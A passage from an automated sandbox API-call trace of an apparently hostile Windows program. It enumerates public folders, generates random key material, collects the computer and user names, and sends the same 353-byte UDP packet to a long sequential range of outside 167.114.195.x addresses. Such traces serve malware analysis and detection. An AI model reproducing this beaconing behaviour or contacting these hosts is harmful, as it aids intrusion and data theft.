lpFileName="c:\\users\\public\\videos\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.555] FindFirstFileW (in: lpFileName="c:\\users\\public\\videos\\sample videos\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.556] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.556] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.556] FindClose (in: hFindFile=0x37be48 | out: hFindFile=0x37be48) returned 1 [0039.556] FindClose (in: hFindFile=0x37cf98 | out: hFindFile=0x37cf98) returned 1 [0039.556] FindClose (in: hFindFile=0x3788e0 | out: hFindFile=0x3788e0) returned 1 [0039.556] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x769f0000 [0039.557] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0039.557] GetLastError () returned 0x57 [0039.557] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0039.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf8d4 | out: lpSystemTimeAsFileTime=0x1cf8d4*(dwLowDateTime=0xf50fc9d0, dwHighDateTime=0x1d43447)) [0039.557] GetLastError () returned 0x7e [0039.557] SetLastError (dwErrCode=0x7e) [0039.557] GetLastError () returned 0x7e [0039.557] SetLastError (dwErrCode=0x7e) [0039.557] GetLastError () returned 0x7e [0039.557] SetLastError (dwErrCode=0x7e) [0039.557] GetUserDefaultLCID () returned 0x409 [0039.557] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0039.557] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0039.558] CryptAcquireContextW (in: phProv=0x1207894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1207894*=0x38b468) returned 1 [0039.704] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0039.704] CryptGenRandom (in: hProv=0x38b468, dwLen=0x1388, pbBuffer=0x378d80 | out: pbBuffer=0x378d80) returned 1 [0039.704] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0039.704] CryptReleaseContext (hProv=0x38b468, dwFlags=0x0) returned 1 [0039.704] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0039.705] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0039.705] CryptAcquireContextW (in: phProv=0x1207894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1207894*=0x38b468) returned 1 [0039.705] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0039.705] CryptGenRandom (in: hProv=0x38b468, dwLen=0x1388, pbBuffer=0x378d80 | out: pbBuffer=0x378d80) returned 1 [0039.705] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0039.705] CryptReleaseContext (hProv=0x38b468, dwFlags=0x0) returned 1 [0039.705] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0039.705] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0039.705] CryptAcquireContextW (in: phProv=0x1207894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1207894*=0x38b468) returned 1 [0039.706] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0039.706] CryptGenRandom (in: hProv=0x38b468, dwLen=0x1388, pbBuffer=0x378d80 | out: pbBuffer=0x378d80) returned 1 [0039.706] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0039.706] CryptReleaseContext (hProv=0x38b468, dwFlags=0x0) returned 1 [0039.706] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0039.706] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0039.706] CryptAcquireContextW (in: phProv=0x1207894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1207894*=0x38b468) returned 1 [0039.706] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0039.706] CryptGenRandom (in: hProv=0x38b468, dwLen=0x1388, pbBuffer=0x378d80 | out: pbBuffer=0x378d80) returned 1 [0039.706] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0039.706] CryptReleaseContext (hProv=0x38b468, dwFlags=0x0) returned 1 [0039.707] GetFileVersionInfoSizeW (in: lptstrFilename="ntdll.dll", lpdwHandle=0x1cf8c8 | out: lpdwHandle=0x1cf8c8) returned 0x704 [0039.831] GetFileVersionInfoW (in: lptstrFilename="ntdll.dll", dwHandle=0x0, dwLen=0x704, lpData=0x37ae40 | out: lpData=0x37ae40) returned 1 [0039.832] VerQueryValueW (in: pBlock=0x37ae40, lpSubBlock="\\", lplpBuffer=0x1cf8ac, puLen=0x120a118 | out: lplpBuffer=0x1cf8ac*=0x37ae68, puLen=0x120a118) returned 1 [0039.833] GetComputerNameW (in: lpBuffer=0x1bf8cc, nSize=0x1bf8c8 | out: lpBuffer="CRH2YWU7", nSize=0x1bf8c8) returned 1 [0039.833] GetUserNameW (in: lpBuffer=0x1bf8cc, pcbBuffer=0x1bf8c8 | out: lpBuffer="EEBsYm5", pcbBuffer=0x1bf8c8) returned 1 [0039.919] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1cf810 | out: lpWSAData=0x1cf810) returned 0 [0039.922] socket (af=2, type=2, protocol=0) returned 0xcc [0040.053] htons (hostshort=0x1af5) returned 0xf51a [0040.053] inet_addr (cp="167.114.194.225") returned 0xe1c272a7 [0040.053] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.225"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.053] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.226"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.053] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.227"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.054] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.228"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.054] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.229"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.054] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.230"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.054] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.231"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.054] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.232"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.054] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.233"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.234"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.235"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.236"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.237"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.238"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.239"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.055] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.240"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.056] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.241"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.056] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.242"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.056] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.243"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.056] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.244"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.056] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.245"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.246"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.247"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.248"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.249"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.250"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.251"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.057] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.252"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.058] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.253"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.058] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.254"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.058] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.1"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.058] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.2"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.058] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.3"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.058] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.4"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.5"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.6"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.7"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.8"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.9"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.10"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.059] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.11"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.12"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.13"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.14"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.15"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.16"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.17"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.060] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.18"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.19"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.20"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.21"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.22"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.23"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.24"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.061] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.25"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.26"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.27"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.28"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.29"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.30"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.31"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.32"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.062] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.33"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.34"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.35"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.36"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.37"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.38"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.39"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.063] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.40"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.41"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.42"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.43"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.44"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.45"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.46"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.064] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.47"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.48"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.49"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.50"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.51"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.52"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.53"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.065] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.54"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.55"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.56"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.57"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.58"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.59"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.60"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.066] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.61"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.067] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.62"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.067] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.63"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.067] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.64"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.067] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.65"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.067] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.66"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.067] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.67"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.68"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.69"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.70"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.71"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.72"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.73"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.068] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.74"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.069] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.75"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.069] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.76"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.069] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.77"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.069] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.78"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.069] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, 